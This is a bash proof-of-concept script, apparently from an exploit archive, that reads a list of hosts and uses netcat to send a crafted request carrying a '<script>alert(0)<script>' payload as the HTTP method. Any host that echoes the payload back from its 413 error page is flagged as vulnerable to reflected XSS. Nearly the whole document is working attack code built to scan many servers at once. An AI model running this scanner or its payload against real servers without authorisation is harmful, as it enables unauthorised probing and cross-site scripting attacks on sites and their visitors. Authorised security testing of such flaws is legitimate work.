Apache 413 Error Message XSS POC

A proof of concept script for Apache 413 Error Message XSS

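#!/usr/bin/env bash
#
# Check Apache 413 XSS against a list of hosts running web server
# Takes Argument 1 a file which contains a list of host (in format: hostname/IP PORT)
# Output a file with host(s) found to be vulnerable
#
#  ./xss_apache_413.sh hosts_file
#
#  sample content of hosts_file (line by line)
#
#  yehg.org 80
#  127.0.0.1 80
#
# Blank lines and lines starting with '#' in hosts_file are ignored; a
# trailing CR (CRLF files) is tolerated.  Requires nc (netcat) and tput.
#
# A host is reported VULNERABLE when any part of its response contains the
# marker string below, i.e. the request was echoed back unescaped.  The
# response status is not inspected, so treat a hit as "reflected", not as a
# confirmed 413 page, and verify by hand.

# -u: an unset variable is a scripting error, not a silent empty host/port.
# No -e: a refused connection makes the probe pipeline fail, which is the
# normal "not vulnerable" outcome and must not abort the whole run.
set -u

# The string the PoC sends as the request method and then looks for in the
# response (unchanged from the original script).
readonly MARKER='<script>alert(0)<script>'

echo '++++++++++++++++++++++++++++++++++++'
echo 'Apache 413 Error Message XSS POC'
# quoted: the unquoted "[at]" used to be a glob that could match a local file
echo 'by Aung Khant, aungkhant[at]yehg.net, http://yehg.net'
echo '++++++++++++++++++++++++++++++++++++'
echo

if [ $# -ne 1 ]; then
  # $0 already carries the path the script was invoked with, so no "./" prefix
  echo "Usage: $0 <hosts_file>" >&2
  exit 1
fi

hostfile=$1
# Lines whose host reflected the marker are appended here (same name as before)
outfile="$hostfile-apache-expect-xssed"

if [ ! -r "$hostfile" ]; then
  echo "[-] cannot read hosts file: $hostfile" >&2
  exit 1
fi
if ! command -v nc >/dev/null 2>&1; then
  echo "[-] nc (netcat) not found on PATH" >&2
  exit 1
fi

#######################################
# Send the probe request to one host and test whether the marker comes back.
# Globals:   MARKER (read)
# Arguments: $1 - hostname or IP, $2 - TCP port
# Returns:   0 if the response contains the marker, non-zero otherwise
#            (including connection failures and timeouts)
#######################################
probe_host() {
  local host=$1 port=$2
  # The request is the original PoC byte for byte.  The host is passed via
  # %s so a '%' or backslash in the hosts file can never alter the format.
  # Only the request line uses a bare "\n"; the headers use "\r\n" as before.
  printf '%s/ HTTP/1.1\nHost: %s\r\nConnection: close\r\nContent-length: 0\r\nContent-length: 0\r\n\r\n' \
    "$MARKER" "$host" \
    | nc -w 4 "$host" "$port" \
    | grep -qiF -- "$MARKER"
}

# Read the file line by line.  The original iterated over `cat $hostfile`
# with default IFS, which split "host port" into two separate words, so the
# host/port parsing below never saw a complete line.
while IFS= read -r line || [ -n "$line" ]; do
  line=${line%$'\r'}
  case "$line" in
    '' | '#'*) continue ;;
  esac

  # shellcheck disable=SC2034 -- _extra only absorbs any trailing fields
  read -r host port _extra <<<"$line"

  # A missing port, or a host that starts with '-', would be handed to nc as
  # an option rather than a destination; skip such lines loudly.
  if [ -z "$port" ] || [ "${host#-}" != "$host" ]; then
    echo "[-] skipping malformed line: $line" >&2
    continue
  fi

  if probe_host "$host" "$port"; then
    printf '[!] %s on port %s ... \033[31mVULNERABLE!\n' "$host" "$port"
    tput sgr0
    # Append the raw input line so the output file keeps the input format.
    printf '%s\n' "$line" >> "$outfile"
  else
    printf '[+] %s on port %s ... \033[32mOK\n' "$host" "$port"
    tput sgr0
  fi
done < "$hostfile"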

Submitted by Aung Khant